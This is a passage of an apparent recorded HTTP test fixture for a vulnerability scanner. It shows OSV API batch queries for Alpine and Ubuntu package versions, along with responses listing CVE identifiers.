"ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2021-3711", "modified": 
"2025-12-03T22:48:47.560805Z" }, { "id": "ALPINE-CVE-2021-3712", "modified": "2025-12-03T22:48:49.466816Z" }, { "id": "ALPINE-CVE-2021-4044", "modified": "2025-12-03T22:48:53.587104Z" }, { "id": "ALPINE-CVE-2022-0778", "modified": "2025-12-03T22:51:07.769542Z" }, { "id": "ALPINE-CVE-2022-1343", "modified": "2025-12-03T22:49:45.912660Z" }, { "id": "ALPINE-CVE-2022-1434", "modified": "2025-12-03T22:49:45.753526Z" }, { "id": "ALPINE-CVE-2022-1473", "modified": "2025-12-03T22:49:45.860197Z" }, { "id": "ALPINE-CVE-2022-2097", "modified": "2025-12-03T22:49:52.265196Z" }, { "id": "ALPINE-CVE-2022-3358", "modified": "2025-12-03T22:50:26.362856Z" }, { "id": "ALPINE-CVE-2022-3602", "modified": "2025-12-03T22:49:29.680146Z" }, { "id": "ALPINE-CVE-2022-3786", "modified": "2025-12-03T22:49:30.746181Z" }, { "id": "ALPINE-CVE-2022-3996", "modified": "2025-12-03T22:49:49.550771Z" }, { "id": "ALPINE-CVE-2022-4203", "modified": "2025-12-03T22:50:09.259826Z" }, { "id": "ALPINE-CVE-2022-4304", "modified": "2025-12-03T22:50:48.258567Z" }, { "id": "ALPINE-CVE-2022-4450", "modified": "2025-12-03T22:50:58.174496Z" }, { "id": "ALPINE-CVE-2023-0215", "modified": "2025-12-03T22:51:20.776116Z" }, { "id": "ALPINE-CVE-2023-0216", "modified": "2025-12-03T22:51:17.381381Z" }, { "id": "ALPINE-CVE-2023-0217", "modified": "2025-12-03T22:51:22.400597Z" }, { "id": "ALPINE-CVE-2023-0286", "modified": "2025-12-03T22:51:24.172927Z" }, { "id": "ALPINE-CVE-2023-0401", "modified": "2025-12-03T22:51:23.275814Z" }, { "id": "ALPINE-CVE-2023-0464", "modified": "2025-12-03T22:51:31.741129Z" }, { "id": "ALPINE-CVE-2023-0465", "modified": "2025-12-03T22:51:25.194508Z" }, { "id": "ALPINE-CVE-2023-1255", "modified": "2025-12-03T22:51:44.316240Z" }, { "id": "ALPINE-CVE-2023-2650", "modified": "2025-12-03T22:52:10.812098Z" }, { "id": "ALPINE-CVE-2023-2975", "modified": "2025-12-03T22:52:35.084843Z" }, { "id": "ALPINE-CVE-2023-3446", "modified": "2025-12-03T22:52:52.082224Z" }, { "id": "ALPINE-CVE-2023-3817", 
"modified": "2025-12-03T22:52:53.211969Z" }, { "id": "ALPINE-CVE-2023-5363", "modified": "2025-12-03T22:54:35.065257Z" }, { "id": "ALPINE-CVE-2023-5678", "modified": "2025-12-03T22:54:30.066451Z" }, { "id": "ALPINE-CVE-2023-6129", "modified": "2025-12-03T22:54:41.708177Z" }, { "id": "ALPINE-CVE-2023-6237", "modified": "2025-12-03T22:54:40.422752Z" }, { "id": "ALPINE-CVE-2024-0727", "modified": "2025-12-03T22:54:44.266485Z" }, { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2019-14697", "modified": "2025-12-03T22:44:35.333781Z" }, { "id": "ALPINE-CVE-2020-28928", "modified": "2025-12-03T22:47:06.985001Z" }, { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2021-28831", "modified": "2025-12-03T22:48:35.192485Z" }, { "id": "ALPINE-CVE-2021-42374", "modified": "2025-12-03T22:49:03.048460Z" }, { "id": "ALPINE-CVE-2021-42375", "modified": "2025-12-03T22:49:02.368046Z" }, { "id": "ALPINE-CVE-2021-42378", "modified": "2025-12-03T22:49:02.812229Z" }, { "id": "ALPINE-CVE-2021-42379", "modified": "2025-12-03T22:49:03.820223Z" }, { "id": "ALPINE-CVE-2021-42380", "modified": "2025-12-03T22:49:02.273108Z" }, { "id": "ALPINE-CVE-2021-42381", 
"modified": "2025-12-03T22:49:03.051591Z" }, { "id": "ALPINE-CVE-2021-42382", "modified": "2025-12-03T22:49:04.080847Z" }, { "id": "ALPINE-CVE-2021-42383", "modified": "2025-12-03T22:44:20.740566Z" }, { "id": "ALPINE-CVE-2021-42384", "modified": "2025-12-03T22:49:04.436301Z" }, { "id": "ALPINE-CVE-2021-42385", "modified": "2025-12-03T22:49:10.217079Z" }, { "id": "ALPINE-CVE-2021-42386", "modified": "2025-12-03T22:49:10.486445Z" }, { "id": "ALPINE-CVE-2022-28391", "modified": "2025-12-03T22:49:51.276555Z" }, { "id": "ALPINE-CVE-2022-30065", "modified": "2025-12-03T22:50:17.721153Z" }, { "id": "ALPINE-CVE-2022-48174", "modified": "2025-12-03T22:51:16.750993Z" }, { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" } ] } ] } headers: Content-Length: - "9123" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 7442 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:20.04", "name": "adduser" }, "version": "3.118ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-files" }, "version": "11ubuntu5.8" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-passwd" }, "version": "3.5.47" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bash" }, "version": "5.0-6ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "dash" }, 
"version": "0.5.10.2-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debconf" }, "version": "1.5.73" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debianutils" }, "version": "4.9.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "findutils" }, "version": "4.7.0-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "grep" }, "version": "3.4-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gzip" }, "version": "1.10-0ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "hostname" }, "version": "3.23" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "init-system-helpers" }, "version": "1.57" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "acl" }, "version": "2.2.53-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "attr" }, "version": "1:2.4.48-5" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libcap-ng" }, "version": "0.7.9-2.1build1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libxcrypt" }, "version": "1:4.4.10-10ubuntu4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.6ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "cdebconf" }, "version": "0.251ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { 
"package": { "ecosystem": "Ubuntu:20.04", "name": "libffi" }, "version": "3.3-4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gmp" }, "version": "2:6.2.0+dfsg-4ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libgpg-error" }, "version": "1.37-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libidn2" }, "version": "2.2.0-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "xz-utils" }, "version": "5.2.4-1ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "p11-kit" }, "version": "0.23.20-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libseccomp" }, "version": "2.5.1-1ubuntu1~20.04.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libselinux" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsepol" }, "version": "3.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libunistring" }, "version": "0.9.10-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libzstd" }, "version": "1.4.4+dfsg-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "lsb" }, "version": "11.1.0ubuntu2" }, { "package": { "ecosystem": 
"Ubuntu:20.04", "name": "mawk" }, "version": "1.3.4.20200120-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sensible-utils" }, "version": "0.0.12+nmu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sysvinit" }, "version": "2.96-2.1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "ubuntu-keyring" }, "version": "2020.02.11.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_no_vulns_shown url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 256 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "256" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 7442 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:20.04", "name": "adduser" }, "version": "3.118ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-files" }, "version": "11ubuntu5.8" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "base-passwd" }, "version": "3.5.47" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bash" }, "version": "5.0-6ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "dash" }, "version": "0.5.10.2-6" }, { 
"package": { "ecosystem": "Ubuntu:20.04", "name": "debconf" }, "version": "1.5.73" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "debianutils" }, "version": "4.9.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "findutils" }, "version": "4.7.0-1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "grep" }, "version": "3.4-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gzip" }, "version": "1.10-0ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "hostname" }, "version": "3.23" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "init-system-helpers" }, "version": "1.57" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "acl" }, "version": "2.2.53-6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "apt" }, "version": "2.0.10" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "attr" }, "version": "1:2.4.48-5" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "audit" }, "version": "1:2.8.5-2ubuntu6" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "bzip2" }, "version": "1.0.8-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libcap-ng" }, "version": "0.7.9-2.1build1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libxcrypt" }, "version": "1:4.4.10-10ubuntu4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.6ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "cdebconf" }, "version": "0.251ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": 
"Ubuntu:20.04", "name": "libffi" }, "version": "3.3-4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "gmp" }, "version": "2:6.2.0+dfsg-4ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libgpg-error" }, "version": "1.37-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libidn2" }, "version": "2.2.0-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "xz-utils" }, "version": "5.2.4-1ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "nettle" }, "version": "3.5.1+really3.5.1-2ubuntu0.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "p11-kit" }, "version": "0.23.20-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libseccomp" }, "version": "2.5.1-1ubuntu1~20.04.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libselinux" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsemanage" }, "version": "3.0-1build2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libsepol" }, "version": "3.0-1ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libunistring" }, "version": "0.9.10-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "libzstd" }, "version": "1.4.4+dfsg-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "e2fsprogs" }, "version": "1.45.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "lsb" }, "version": "11.1.0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "mawk" 
}, "version": "1.3.4.20200120-2" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "procps" }, "version": "2:3.3.16-1ubuntu2.4" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sensible-utils" }, "version": "0.0.12+nmu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "sysvinit" }, "version": "2.96-2.1ubuntu1" }, { "package": { "ecosystem": "Ubuntu:20.04", "name": "ubuntu-keyring" }, "version": "2020.02.11.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage/Empty_Ubuntu_20.04_image_tar_with_only_unimportant_vulns_shown url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 256 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "UBUNTU-CVE-2017-11164", "modified": "2026-01-20T16:49:00.053545Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} ] } headers: Content-Length: - "256" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14065 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Ubuntu:22.04", "name": "adduser" }, "version": "3.118ubuntu5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-files" }, "version": "12ubuntu4.7" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "base-passwd" }, "version": "3.5.52build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bash" }, "version": "5.1-6ubuntu1.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "1:2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "coreutils" }, "version": 
"8.32-4.1ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dash" }, "version": "0.5.11+git20210903+057cd650a4ed-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debconf" }, "version": "1.5.79ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "debianutils" }, "version": "5.5-1ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "diffutils" }, "version": "1:3.8-0ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "dpkg" }, "version": "1.21.1ubuntu2.3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "findutils" }, "version": "4.8.0-1ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnupg2" }, "version": "2.2.27-3ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "grep" }, "version": "3.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gzip" }, "version": "1.10-4ubuntu4.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "hostname" }, "version": "3.23ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "init-system-helpers" }, "version": "1.62" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "acl" }, "version": "2.3.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "apt" }, "version": "2.4.13" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "attr" }, "version": "1:2.5.1-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "audit" }, "version": "1:3.0.7-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "bzip2" }, "version": "1.0.8-5build1" }, { "package": { "ecosystem": "Ubuntu:22.04", 
"name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "glibc" }, "version": "2.35-0ubuntu3.8" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap-ng" }, "version": "0.7.9-2.2build3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libcap2" }, "version": "1:2.44-1ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libxcrypt" }, "version": "1:4.4.27-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.8ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "cdebconf" }, "version": "0.261ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libffi" }, "version": "3.4.2-4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgcrypt20" }, "version": "1.9.4-3ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gmp" }, "version": "2:6.2.1+dfsg-3ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gnutls28" }, "version": "3.7.3-4ubuntu1.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libgpg-error" }, "version": "1.43-3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libidn2" }, "version": "2.3.2-2build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "keyutils" }, "version": "1.6.1-2ubuntu3" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, 
{ "package": { "ecosystem": "Ubuntu:22.04", "name": "krb5" }, "version": "1.19.2-2ubuntu0.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lz4" }, "version": "1.9.3-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xz-utils" }, "version": "5.2.5-2ubuntu1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "nettle" }, "version": "3.7.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libnsl" }, "version": "1.3.0-2build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "p11-kit" }, "version": "0.24.0-6build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pam" }, "version": "1.4.0-11ubuntu2.5" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre2" }, "version": "10.39-3ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "pcre3" }, "version": "2:8.39-13ubuntu0.22.04.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "procps" }, "version": "2:3.3.17-6ubuntu2.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libseccomp" }, "version": "2.5.3-2ubuntu2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libselinux" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsemanage" }, "version": "3.3-1build2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libsepol" }, 
"version": "3.3-1build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "openssl" }, "version": "3.0.2-0ubuntu1.18" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "gcc-12" }, "version": "12.3.0-1ubuntu1~22.04" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtasn1-6" }, "version": "4.18.0-4build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "ncurses" }, "version": "6.3-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libtirpc" }, "version": "1.3.2-2ubuntu0.1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "systemd" }, "version": "249.11-0ubuntu3.12" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libunistring" }, "version": "1.0-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "util-linux" }, "version": "2.37.2-4ubuntu3.4" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "xxhash" }, "version": "0.8.1-1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "libzstd" }, "version": "1.4.8+dfsg-3build1" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "shadow" }, "version": "1:4.8.1-2ubuntu2.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "e2fsprogs" }, "version": "1.46.5-2ubuntu1.2" }, { "package": { "ecosystem": "Ubuntu:22.04", "name": "lsb" }, "version": 